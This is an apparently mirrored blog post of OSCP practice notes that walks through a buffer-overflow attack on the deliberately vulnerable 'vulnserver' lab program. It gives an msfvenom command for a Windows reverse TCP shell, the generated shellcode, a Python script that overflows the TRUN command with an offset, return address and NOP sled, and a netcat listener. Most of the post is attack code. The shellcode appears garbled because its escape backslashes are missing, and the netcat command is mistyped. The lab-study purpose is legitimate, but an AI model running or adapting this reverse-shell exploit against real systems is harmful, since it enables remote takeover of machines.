zoukankan      html  css  js  c++  java
  • OSCP Security Technology

    OSCP Security Technology - Generating Shellcode& Gaining Root

    Generating shellcode.(Note: LHOST is Kali Linux's IP)

    msfvenom -p windows/shell_reverse_tcp LHOST=192.168.2.24 LPORT=4444 EXITFUNC=thread -f c -a x86 --platform windows -b "x00"
    

    image-20210627202658912

    "xdaxcdxd9x74x24xf4xbfx1exa7x4bx98x5ax2bxc9xb1"
    "x52x31x7ax17x83xc2x04x03x64xb4xa9x6dx64x52xaf"
    "x8ex94xa3xd0x07x71x92xd0x7cxf2x85xe0xf7x56x2a"
    "x8ax5ax42xb9xfex72x65x0axb4xa4x48x8bxe5x95xcb"
    "x0fxf4xc9x2bx31x37x1cx2ax76x2axedx7ex2fx20x40"
    "x6ex44x7cx59x05x16x90xd9xfaxefx93xc8xadx64xca"
    "xcax4cxa8x66x43x56xadx43x1dxedx05x3fx9cx27x54"
    "xc0x33x06x58x33x4dx4fx5fxacx38xb9xa3x51x3bx7e"
    "xd9x8dxcex64x79x45x68x40x7bx8axefx03x77x67x7b"
    "x4bx94x76xa8xe0xa0xf3x4fx26x21x47x74xe2x69x13"
    "x15xb3xd7xf2x2axa3xb7xabx8exa8x5axbfxa2xf3x32"
    "x0cx8fx0bxc3x1ax98x78xf1x85x32x16xb9x4ex9dxe1"
    "xbex64x59x7dx41x87x9ax54x86xd3xcaxcex2fx5cx81"
    "x0excfx89x06x5ex7fx62xe7x0ex3fxd2x8fx44xb0x0d"
    "xafx67x1ax26x5ax92xcdx89x33x9ex15x62x46x9ex34"
    "x2excfx78x5cxdex99xd3xc9x47x80xafx68x87x1exca"
    "xabx03xadx2bx65xe4xd8x3fx12x04x97x1dxb5x1bx0d"
    "x09x59x89xcaxc9x14xb2x44x9ex71x04x9dx4ax6cx3f"
    "x37x68x6dxd9x70x28xaax1ax7exb1x3fx26xa4xa1xf9"
    "xa7xe0x95x55xfexbex43x10xa8x70x3dxcax07xdbxa9"
    "x8bx6bxdcxafx93xa1xaax4fx25x1cxebx70x8axc8xfb"
    "x09xf6x68x03xc0xb2x89xe6xc0xcex21xbfx81x72x2c"
    "x40x7cxb0x49xc3x74x49xaexdbxfdx4cxeax5bxeex3c"
    "x63x0ex10x92x84x1b"
    

    Write the exploit script.

    nano exploit.py
    chmod 777 exploit.py
    
    #!/usr/bin/python
    import socket
    import sys
    
    exploit = (
    "xdaxcdxd9x74x24xf4xbfx1exa7x4bx98x5ax2bxc9xb1"
    "x52x31x7ax17x83xc2x04x03x64xb4xa9x6dx64x52xaf"
    "x8ex94xa3xd0x07x71x92xd0x7cxf2x85xe0xf7x56x2a"
    "x8ax5ax42xb9xfex72x65x0axb4xa4x48x8bxe5x95xcb"
    "x0fxf4xc9x2bx31x37x1cx2ax76x2axedx7ex2fx20x40"
    "x6ex44x7cx59x05x16x90xd9xfaxefx93xc8xadx64xca"
    "xcax4cxa8x66x43x56xadx43x1dxedx05x3fx9cx27x54"
    "xc0x33x06x58x33x4dx4fx5fxacx38xb9xa3x51x3bx7e"
    "xd9x8dxcex64x79x45x68x40x7bx8axefx03x77x67x7b"
    "x4bx94x76xa8xe0xa0xf3x4fx26x21x47x74xe2x69x13"
    "x15xb3xd7xf2x2axa3xb7xabx8exa8x5axbfxa2xf3x32"
    "x0cx8fx0bxc3x1ax98x78xf1x85x32x16xb9x4ex9dxe1"
    "xbex64x59x7dx41x87x9ax54x86xd3xcaxcex2fx5cx81"
    "x0excfx89x06x5ex7fx62xe7x0ex3fxd2x8fx44xb0x0d"
    "xafx67x1ax26x5ax92xcdx89x33x9ex15x62x46x9ex34"
    "x2excfx78x5cxdex99xd3xc9x47x80xafx68x87x1exca"
    "xabx03xadx2bx65xe4xd8x3fx12x04x97x1dxb5x1bx0d"
    "x09x59x89xcaxc9x14xb2x44x9ex71x04x9dx4ax6cx3f"
    "x37x68x6dxd9x70x28xaax1ax7exb1x3fx26xa4xa1xf9"
    "xa7xe0x95x55xfexbex43x10xa8x70x3dxcax07xdbxa9"
    "x8bx6bxdcxafx93xa1xaax4fx25x1cxebx70x8axc8xfb"
    "x09xf6x68x03xc0xb2x89xe6xc0xcex21xbfx81x72x2c"
    "x40x7cxb0x49xc3x74x49xaexdbxfdx4cxeax5bxeex3c"
    "x63x0ex10x92x84x1b")
    
    shellcode = "A" * 2003 + "xafx11x50x62" + "x90" * 32 + exploit
    
    s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    
    try:
        connect=s.connect(('192.168.2.21',9999))
        s.send(('TRUN /.:/' + shellcode))
    except:
        print "check debugger" 
    s.close()
    

    Run the vulnserver and then run the exploit script.

    nc - nvlp 4444
    
    ./exploit.py
    

    image-20210627200903029

    image-20210627202757022

    相信未来 - 该面对的绝不逃避,该执著的永不怨悔,该舍弃的不再留念,该珍惜的好好把握。
  • 相关阅读:
    sleuth使用说明(入门)
    git学习
    rancher中级(二)(rancher中添加证书及操作虚拟主机)
    rancher中级(一)(rancher的存储,网络)
    rancher初级(搭建+基本操作+web应用部署)
    Docker学习笔记
    面试-框架篇
    面试-核心篇
    面试-基础篇
    「译」JUnit 5 系列:扩展模型(Extension Model)
  • 原文地址:https://www.cnblogs.com/keepmoving1113/p/14942003.html
Copyright © 2011-2022 走看看